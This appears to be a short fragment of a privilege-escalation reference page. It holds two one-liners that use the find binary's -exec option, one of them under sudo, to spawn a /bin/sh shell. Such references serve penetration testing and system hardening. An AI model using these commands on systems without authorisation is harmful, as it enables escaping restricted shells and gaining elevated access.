/usr/bin/find

find . -exec /bin/sh \; -quit

or

sudo find . -exec /bin/sh \; -quit

Last updated